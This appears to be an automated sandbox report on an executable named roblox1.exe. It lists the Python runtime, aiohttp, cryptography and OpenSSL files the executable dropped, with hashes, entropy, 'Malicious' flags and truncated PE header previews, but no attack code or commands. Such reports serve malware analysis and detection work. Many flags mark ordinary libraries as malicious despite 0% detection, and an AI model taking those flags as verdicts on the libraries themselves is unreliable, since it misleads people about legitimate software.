                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23976
                                                                                                                                                                                                                                  Entropy (8bit):6.5352541220575695
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:I3AVpEWz6TPQxISewl4IYiSy1pCQXdW4i/8E9VFL2Utah:ISpENTQxISewLYiSyvNWeEdy
                                                                                                                                                                                                                                  MD5:13AA3AF9AED86CC917177AE1F41ACC9B
                                                                                                                                                                                                                                  SHA1:F5D95679AFDA44A6689DBB45E93EBE0E9CD33D69
                                                                                                                                                                                                                                  SHA-256:51DD1EA5E8CACF7EC4CADEFDF685334C7725FF85978390D0B3D67FC8C54FE1DB
                                                                                                                                                                                                                                  SHA-512:E1F5DBD6C0AFCF207DE0100CBA6F1344FEB0006A5C12DC92768AB2D24E3312F0852F3CD31A416AAFEB0471CD13A6C0408F0DA62956F7870B2E22D174A8B23C45
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&Gp.G)#.G)#.G)#.?.#.G)#.=(".G)#.=,".G)#.=-".G)#.=*".G)#.=(".G)#55(".G)#.G(#.G)#.=!".G)#.=)".G)#.=.#.G)#.=+".G)#Rich.G)#................PE..d....K.b.........." ... .....&...... ........................................p.......&....`.........................................`)..L....)..x....P.......@.......4...)...`..@...`#..T........................... "..@............ ..8............................text...h........................... ..`.rdata....... ......................@..@.data........0.......$..............@....pdata.......@.......&..............@..@.rsrc........P.......(..............@..@.reloc..@....`.......2..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):54784
                                                                                                                                                                                                                                  Entropy (8bit):5.723071280644947
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:DTcl94C2NHW3W3MvYrglsf9pbjfYSLBJrIBhGyoCOpq7+xBNnQfQ0uwu:Hcl9sUmMVodbJkPhox5UQ0uB
                                                                                                                                                                                                                                  MD5:BF489369F5E8A61CCA71E29009DC5D95
                                                                                                                                                                                                                                  SHA1:54299F6521B9C397F8969CA92404F492CF572AF6
                                                                                                                                                                                                                                  SHA-256:652364BEA64C5CB50B81CA43A09418E75FD374FFD374DBAA193F4EBB3F9F36BD
                                                                                                                                                                                                                                  SHA-512:C34E607DAF025F6ECC6B8C5118468F4B1EFD82B373C1EA382BB57C33D45845DD28B62111425DDBA637C9C91DF111B1936A950D19BE872F8716FF04B5CF91BDB9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..[n..n..n..g.5.l...g..l..%...l...g..m...g..f...g..b......m..n.....{`..o..{`..o..{`Y.o..{`..o..Richn..........PE..d......f.........." ...(.....V...... ........................................0............`.........................................0...`.......d............................ .........................................@............................................text...x........................... ..`.rdata...6.......8..................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):265216
                                                                                                                                                                                                                                  Entropy (8bit):6.169190575012905
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:6VuE3wfVay+yG9N5EcV5E5V0HV5ffOxnGNp6P2eUm6PIZoHhbjI5l:qV3wfVUv5Eq5ffXKP2RgUbj2
                                                                                                                                                                                                                                  MD5:CFCEB0CC2F7BFE5F8E33061EB40662ED
                                                                                                                                                                                                                                  SHA1:8D27CFA4BF1E32C5EF17BBA4AF1815AB0523A13B
                                                                                                                                                                                                                                  SHA-256:489521FC6B3DE3ABD2F9F3C17DFC42919E44B53453EA439B30240A986152B07C
                                                                                                                                                                                                                                  SHA-512:377E3F3BDB89B486D76860D6BC66D0741F29035105F74CC9CCBF34842F5DA1E7855D9A9531B8AAAD482E708AE49BFBE012E857BF72CED2975AEB4D6B64528918
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\.<...RR..RR..RR...R..RR..SS..RRS.SS..RR..SS..RR..SR.RR..QS..RR..VS..RR..WS..RR..ZS..RR..RS..RR...R..RR..PS..RRRich..RR................PE..d......f.........." ...(.............0....................................................`.........................................@...........x....`.......@..H............p..\......................................@............@...............................text....-.......................... ..`.rdata.......@.......2..............@..@.data....F..........................@....pdata..H....@......................@..@.rsrc........`......................@..@.reloc..\....p......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                  Entropy (8bit):5.733157245866308
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:dFd3TU4fyPems4AhK4n+e5RtoyTyc6Ko2gs5lhpWuFPbPHDPY/Sq8lWi/m7:djTUOF1g4+er2y2HKdgsf/lHjsS7lWi
                                                                                                                                                                                                                                  MD5:60A5DF89F9F9812619FC145B497D7EF0
                                                                                                                                                                                                                                  SHA1:A52F234C1C20CA75E58CEFDDAFF82AA3AD1FE758
                                                                                                                                                                                                                                  SHA-256:C4F748A1BA5AFF15719358C8C98A4B3D58E9A54B0B3FE56A371ECDEFA566278F
                                                                                                                                                                                                                                  SHA-512:C188BCF9C617B2C1FA333B1F71342C75DA0248898D7F2BA98B887EC46EA750C04CC3EF4DF82860BC69D59FA8A746736B598F37DF8650FF3727D6342B09309974
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6..Tr..r..r..{.5.p...g..p..9...p...g..q...g..z...g..~......q..r.....g`..s..g`..s..g`Y.s..g`..s..Richr..................PE..d......f.........." ...(.v...........x.......................................P............`............................................h...H...d....0....... ..0............@......`............................... ...@...............H............................text...(u.......v.................. ..`.rdata...0.......2...z..............@..@.data...(N..........................@....pdata..0.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                  Entropy (8bit):5.5970447917528094
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:YrQDXgJinHx+wr47jrqJUfuk3HI6cX27T/U2HCWWwGeq:ISvHx9s7jus3H9LH5WwGe
                                                                                                                                                                                                                                  MD5:1D2338EFB662095C61A31B36C7FF9A0D
                                                                                                                                                                                                                                  SHA1:DEAEEF56D21CBDF5FED321C4574490334F4453EF
                                                                                                                                                                                                                                  SHA-256:6C092641F8C45B0187A3B5133720AE1BDA215E1E92A9E094AB37DAB4AA7F6642
                                                                                                                                                                                                                                  SHA-512:ACFD558B8CC48ED6356EA20FEAD7D87B402E67955AC1A9B8C3F8C688284376622E30297323CCCEB5A1E81F5F2443B8F6D3A0587B29D46B8CDF9AD666121C9B7E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*.H[n.&.n.&.n.&.g...l.&..g'.l.&.%.'.l.&..g%.m.&..g".f.&..g#.b.&...'.m.&.n.'...&.{`..o.&.{`&.o.&.{`..o.&.{`$.o.&.Richn.&.........................PE..d......f.........." ...(.N...D......0P....................................................`..........................................|..d...t|..d...............4................... s...............................q..@............`...............................text....L.......N.................. ..`.rdata...+...`...,...R..............@..@.data................~..............@....pdata..4...........................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\certifi\cacert.pem

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):299427
                                                                                                                                                                                                                                  Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                  MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                  SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                  SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                  SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7900672
                                                                                                                                                                                                                                  Entropy (8bit):6.519460416205842
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
                                                                                                                                                                                                                                  MD5:81AD4F91BB10900E3E2E8EAF917F42C9
                                                                                                                                                                                                                                  SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
                                                                                                                                                                                                                                  SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
                                                                                                                                                                                                                                  SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(...(...(...!...:...8...*...8...,...8... ...8...9...c..&...G...*...(...+...`...V...(.....`...)...`...)...Rich(...........................PE..d....j.f.........." ...).`Z..V........X.......................................x...........`.........................................p.r.......r...............t...............x......Cj.T....................Cj.(....Aj.@............pZ..............................text...._Z......`Z................. ..`.rdata..ZR...pZ..T...dZ.............@..@.data....+....r.......r.............@....pdata........t.......s.............@..@.reloc........x.......w.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):86016
                                                                                                                                                                                                                                  Entropy (8bit):5.9308989665858585
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:ZmwCw3vZ1w4vI1FxF6S2s0suvV81dvUflo6vp9862WhFo1emYU+:Z/CwxqC+bsNlflo6h93FiemYL
                                                                                                                                                                                                                                  MD5:911470750962640CEB3FD11E2AEECD14
                                                                                                                                                                                                                                  SHA1:AF797451D4028841D92F771885CB9D81AFBA3F96
                                                                                                                                                                                                                                  SHA-256:5C204F6966526AF4DC0C0D6D29909B6F088C4FA781464F2948414D833B03094D
                                                                                                                                                                                                                                  SHA-512:637043C20DC17FBC472613C0E4F576F0A2211B7916B3488806AEC30271CF1BD84BD790518335B88910662FD4844F8ED39FA75AA278577271A966756B8CD793F7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._5..1f..1f..1f.f..1f..0g..1f..0g..1f..4g..1f..5g..1f..2g..1f..0g..1f..0fS.1f.q9g..1f.q1g..1f.q.f..1f.q3g..1fRich..1f........................PE..d.....{e.........." ...%.....t......p.....................................................`.........................................p6..h....6..x............p..4....................&...............................$..@...............(............................text............................... ..`.rdata...I.......J..................@..@.data...P....P.......2..............@....pdata..4....p.......@..............@..@.rsrc................L..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libcrypto-1_1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):3439512
                                                                                                                                                                                                                                  Entropy (8bit):6.096012359425593
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:98304:kw+jlHDGV+EafwAlViBksm1CPwDv3uFfJ1:1slHDG2fwAriXm1CPwDv3uFfJ1
                                                                                                                                                                                                                                  MD5:AB01C808BED8164133E5279595437D3D
                                                                                                                                                                                                                                  SHA1:0F512756A8DB22576EC2E20CF0CAFEC7786FB12B
                                                                                                                                                                                                                                  SHA-256:9C0A0A11629CCED6A064932E95A0158EE936739D75A56338702FED97CB0BAD55
                                                                                                                                                                                                                                  SHA-512:4043CDA02F6950ABDC47413CFD8A0BA5C462F16BCD4F339F9F5A690823F4D0916478CAB5CAE81A3D5B03A8A196E17A716B06AFEE3F92DEC3102E3BBC674774F2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R.m.R.m.R.m.[...@.m.0.l.P.m.0.h.^.m.0.i.Z.m.0.n.V.m.R.l..m..l.Y.m...n.O.m...i.+.m...m.S.m....S.m...o.S.m.RichR.m.........................PE..d...`.0b.........." ......$...................................................5......4...`..........................................x/..h...:4.@....p4.|....p2.8....\4.......4..O....,.8...........................`.,.@............04..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......p2.......1.............@..@.idata..^#...04..$....3.............@..@.00cfg..u....`4.......3.............@..@.rsrc...|....p4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libffi-7.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32792
                                                                                                                                                                                                                                  Entropy (8bit):6.3566777719925565
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                                                                                                                                                                  MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                                                                                                                                                                  SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                                                                                                                                                                  SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                                                                                                                                                                  SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libssl-1_1.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):698784
                                                                                                                                                                                                                                  Entropy (8bit):5.533720236597082
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:waXWJ978LddzAPcWTWxYx2OCf2QmAr39Zu+DIpEpXKWRq0qwMUxQU2lvz:dddzAjKnD/QGXKzpwMUCU2lvz
                                                                                                                                                                                                                                  MD5:DE72697933D7673279FB85FD48D1A4DD
                                                                                                                                                                                                                                  SHA1:085FD4C6FB6D89FFCC9B2741947B74F0766FC383
                                                                                                                                                                                                                                  SHA-256:ED1C8769F5096AFD000FC730A37B11177FCF90890345071AB7FBCEAC684D571F
                                                                                                                                                                                                                                  SHA-512:0FD4678C65DA181D7C27B19056D5AB0E5DD0E9714E9606E524CDAD9E46EC4D0B35FE22D594282309F718B30E065F6896674D3EDCE6B3B0C8EB637A3680715C2C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......{.T.?.:.?.:.?.:.6f..3.:.]f;.=.:..l;.=.:.]f?.3.:.]f>.7.:.]f9.;.:..g;.<.:.?.;...:..g>...:..g:.>.:..g.>.:..g8.>.:.Rich?.:.........PE..d.....0b.........." .....<...T......<................................................[....`.........................................00...N..HE..........s.......|M..............h... ...8...............................@............0..H............................text....:.......<.................. ..`.rdata..:....P...0...@..............@..@.data...AM.......D...p..............@....pdata..dV.......X..................@..@.idata..PW...0...X..................@..@.00cfg..u............d..............@..@.rsrc...s............f..............@..@.reloc..a............n..............@..B................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47616
                                                                                                                                                                                                                                  Entropy (8bit):5.316469446718147
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:3Y2vE6F6hmSrnDe651sYEYMXMBkYcE6n0/d3g:oAoVDeWlEEBkYcDni
                                                                                                                                                                                                                                  MD5:95463F615865A472F75DDB365644A571
                                                                                                                                                                                                                                  SHA1:91F22EF3F2FFD3E9D6CE6E58BEEA9A96287B090B
                                                                                                                                                                                                                                  SHA-256:9EE77474D244A17337D4CCC5113FE4AF7B4D86F9969293A884927718D06E63C8
                                                                                                                                                                                                                                  SHA-512:E3CCCCE9EBF5E7CF33E68046D3E7B59E454CCB791635EB5F405977FD270126EF8B58E6288DBE58C96B681361D81EF28720EBA8D0BD389BFB0F4C3114D098A117
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o.T.............v?............v........................&{................................S.............Rich............PE..d....|.f.........." ...).\...`......`^....................................................`.............................................d.......d...............................L.......................................@............p...............................text....Z.......\.................. ..`.rdata...,...p.......`..............@..@.data....#..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pyd

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198568
                                                                                                                                                                                                                                  Entropy (8bit):6.360283939217406
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:rkPTemtXBsiLC/QOSL6XZIMuPbBV3Dy9zeL9ef93d1BVdOd8dVyio0OwUpz1RPoi:AKmVG/pxIMuPbBFEFDBwpp2W
                                                                                                                                                                                                                                  MD5:6BC89EBC4014A8DB39E468F54AAAFA5E
                                                                                                                                                                                                                                  SHA1:68D04E760365F18B20F50A78C60CCFDE52F7FCD8
                                                                                                                                                                                                                                  SHA-256:DBE6E7BE3A7418811BD5987B0766D8D660190D867CD42F8ED79E70D868E8AA43
                                                                                                                                                                                                                                  SHA-512:B7A6A383EB131DEB83EEE7CC134307F8545FB7D043130777A8A9A37311B64342E5A774898EDD73D80230AB871C4D0AA0B776187FA4EDEC0CCDE5B9486DBAA626
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...........6...k.....k.....k.....k.....o............|.o.....o.....o.Z...o.....Rich..................PE..d....K.b.........." ... ............0................................................0....`.........................................`...P................................)..........@6..T............................5..@............ ...............................text...K........................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python3.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):64936
                                                                                                                                                                                                                                  Entropy (8bit):6.1037683983631625
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:kD8LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqL:kDwewnvtjnsfwaVISQ0a7SydEnn
                                                                                                                                                                                                                                  MD5:07BD9F1E651AD2409FD0B7D706BE6071
                                                                                                                                                                                                                                  SHA1:DFEB2221527474A681D6D8B16A5C378847C59D33
                                                                                                                                                                                                                                  SHA-256:5D78CD1365EA9AE4E95872576CFA4055342F1E80B06F3051CF91D564B6CD09F5
                                                                                                                                                                                                                                  SHA-512:DEF31D2DF95CB7999CE1F55479B2FF7A3CB70E9FC4778FC50803F688448305454FBBF82B5A75032F182DFF663A6D91D303EF72E3D2CA9F2A1B032956EC1A0E2A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........f..A.e.A.e.A.e.%}m.@.e.%}e.@.e.%}..@.e.%}g.@.e.RichA.e.........................PE..d....K.b.........." ... ..................................................................`.........................................`...`................................)..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python310.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4493736
                                                                                                                                                                                                                                  Entropy (8bit):6.465157771728023
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:49152:5vL1txd/8sCmiAiPw+RxtLzli0Im3wOc+28Ivu31WfbF9PtF+FNDHaSclAaBlh7y:Dw7Ad07RmodacSeSHCMTbSp4PS
                                                                                                                                                                                                                                  MD5:C80B5CB43E5FE7948C3562C1FFF1254E
                                                                                                                                                                                                                                  SHA1:F73CB1FB9445C96ECD56B984A1822E502E71AB9D
                                                                                                                                                                                                                                  SHA-256:058925E4BBFCB460A3C00EC824B8390583BAEF0C780A7C7FF01D43D9EEC45F20
                                                                                                                                                                                                                                  SHA-512:FAA97A9D5D2A0BF78123F19F8657C24921B907268938C26F79E1DF6D667F7BEE564259A3A11022E8629996406CDA9FA00434BB2B1DE3E10B9BDDC59708DBAD81
